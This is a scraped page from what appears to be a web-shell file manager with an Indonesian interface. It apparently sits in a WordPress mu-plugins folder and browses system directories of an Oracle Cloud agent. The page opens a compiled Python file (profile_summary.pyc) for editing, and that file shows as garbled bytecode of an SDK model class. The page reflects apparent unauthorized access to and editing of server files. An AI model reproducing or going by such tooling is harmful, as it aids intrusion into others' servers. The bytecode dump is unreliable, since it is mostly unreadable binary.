📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
optimizer
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/optimizer/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: profile_summary.pyc
a O��f�A � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdZdZ dZ d Zd Zdd� Z ed d� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zedd � �Zejd!d � �Zed"d#� �Zejd$d#� �Zed%d&� �Zejd'd&� �Zed(d)� �Zejd*d)� �Zed+d,� �Zejd-d,� �Zed.d/� �Zejd0d/� �Zed1d2� �Zejd3d2� �Zd4d5� Zd6d7� Zd8d9� Zd:S );�ProfileSummaryz; The metadata associated with the profile summary. �ACTIVE�FAILED�INACTIVE� ATTACHING� DETACHING�DELETING�DELETED�UPDATING�CREATINGc K s� dddddddddddddd � | _ d ddd dddddddddd � | _d| _d| _d| _d| _d| _d| _d| _d| _ d| _ d| _d| _d| _ d| _dS )a Initializes a new ProfileSummary object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param id: The value to assign to the id property of this ProfileSummary. :type id: str :param compartment_id: The value to assign to the compartment_id property of this ProfileSummary. :type compartment_id: str :param name: The value to assign to the name property of this ProfileSummary. :type name: str :param description: The value to assign to the description property of this ProfileSummary. :type description: str :param aggregation_interval_in_days: The value to assign to the aggregation_interval_in_days property of this ProfileSummary. :type aggregation_interval_in_days: int :param defined_tags: The value to assign to the defined_tags property of this ProfileSummary. :type defined_tags: dict(str, dict(str, object)) :param freeform_tags: The value to assign to the freeform_tags property of this ProfileSummary. :type freeform_tags: dict(str, str) :param lifecycle_state: The value to assign to the lifecycle_state property of this ProfileSummary. Allowed values for this property are: "ACTIVE", "FAILED", "INACTIVE", "ATTACHING", "DETACHING", "DELETING", "DELETED", "UPDATING", "CREATING", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type lifecycle_state: str :param levels_configuration: The value to assign to the levels_configuration property of this ProfileSummary. :type levels_configuration: oci.optimizer.models.LevelsConfiguration :param target_compartments: The value to assign to the target_compartments property of this ProfileSummary. :type target_compartments: oci.optimizer.models.TargetCompartments :param target_tags: The value to assign to the target_tags property of this ProfileSummary. :type target_tags: oci.optimizer.models.TargetTags :param time_created: The value to assign to the time_created property of this ProfileSummary. :type time_created: datetime :param time_updated: The value to assign to the time_updated property of this ProfileSummary. :type time_updated: datetime �str�intzdict(str, dict(str, object))zdict(str, str)�LevelsConfiguration�TargetCompartments� TargetTags�datetime) �id�compartment_id�name�description�aggregation_interval_in_days�defined_tags� freeform_tags�lifecycle_state�levels_configuration�target_compartments�target_tags�time_created�time_updatedr � compartmentIdr r �aggregationIntervalInDays�definedTags�freeformTags�lifecycleState�levelsConfiguration�targetCompartments� targetTags�timeCreated�timeUpdatedN)� swagger_types� attribute_map�_id�_compartment_id�_name�_description�_aggregation_interval_in_days� _defined_tags�_freeform_tags�_lifecycle_state�_levels_configuration�_target_compartments�_target_tags� _time_created� _time_updated)�self�kwargs� r>